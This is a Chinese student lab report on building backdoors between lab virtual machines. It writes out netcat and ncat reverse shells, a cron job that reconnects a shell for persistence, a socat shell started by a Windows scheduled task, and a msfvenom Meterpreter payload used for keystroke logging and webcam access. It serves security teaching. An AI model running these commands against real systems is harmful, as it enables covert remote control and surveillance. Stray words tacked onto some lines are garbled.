(1)例舉你能想到的一個後門進入到你係統中的可能方式?html
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?linux
(3)Meterpreter有哪些給你映像深入的功能?shell
(4)如何發現本身有系統有沒有被安裝後門?vim
在kali虛擬機中輸入ifconfig
,在WIN7虛擬機中輸入ipconfig
,找到兩個虛擬機的ip地址(通常在同一網段),在VMware Station中打開虛擬機
->設置
->網絡適配器
->NAT模式
能夠在沒有聯網的時候仍然ping通同一主機上的兩臺虛擬機。windows
kali端控制Win7端網絡
1. kali:nc -l -p 端口號 2. Win7:ncat.exe -e cmd.exe kali主機ip 端口號//反向鏈接kali主機,端口號爲kali主機的端口號 3. kali:能夠輸入Windows命令
1. Win7:ncat.exe -l -p 端口號 2. Kali:nc kali主機ip 端口號 -e /bin/sh//反向鏈接Win7主機,端口號爲Win7主機的端口號
經過ncat傳字符串
一個主機開啓端口監聽,另外一個主機鏈接到這個端口,不用連接到cmd.exe或是shell能夠實現兩臺主機的數據傳輸
tcp
- Win7:ncat.exe -l -p 端口號 - kali:crontab -e //指令編輯一條定時任務 - kali:選擇vim.basic - kali:時間(分) * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh//在最後一行添加,時間是指每一小時執行一次的分鐘數,按照本身的kali虛擬機的時間設定,否則可能要等好久才能獲得shell - Win7:獲得shell執行linux指令
socat [options] address address
- 打開Win7虛擬機中的控制面板,選擇查看方式爲:大圖標;找到:管理工具,打開;找到:任務計劃程序,打開; - 在右側一欄中選擇:建立任務,打開; - 填寫任務名稱;新建觸發器,選擇開始任務時間爲:工做站鎖定時,便於操做; - 新建操做,選擇啓動的程序爲socat.exe,參數填爲:tcp-listen:端口號 exec:cmd.exe,pty,stderr,這一操做的含義是把cmd.exe綁定到端口號,同時把cmd.exe的stderr重定向到stdout上 - 用快捷鍵Windows+L鎖定虛擬機,任務啓動 - 在kali虛擬機終端輸入socat - tcp:192.168.1.200:端口號,能夠控制Win7的cmd。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.144 LPORT=5203 -f exe > dkx20155203_backdoor.exe
注意這裏的地址是發起攻擊主機的地址,也就是kali的地址,生成文件後,會有文件大小的相關說明。1. Win7:ncat.exe -l > dkx20155203_backdoor.exe 2. kali:nc 192.168.230.141 5203 < dkx_20155203_backdoor.exe//這裏的地址是Win7的地址
接收到要檢查文件大小,不幸運的時候有多是0KB,後面就什麼也幹不了。工具
msfconsole
指令進入msf控制檯,設置LPORT、LHOST軍與生成可執行文件相同,設置payload。執行exploit如圖所示:
.net
若是鏈接攝像頭出錯,切換到WIN7虛擬機(VMware Station)點擊虛擬機->可移動設備->xxx Camera->鏈接
3d
這個擊鍵記錄頗有趣,由於若是我是複製的它也記錄不了,懶人無敵~
解決辦法:
試了五六次,成功了!
(5)可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell(1分)加份內容一併寫入本實驗報告。
有趣的實驗體驗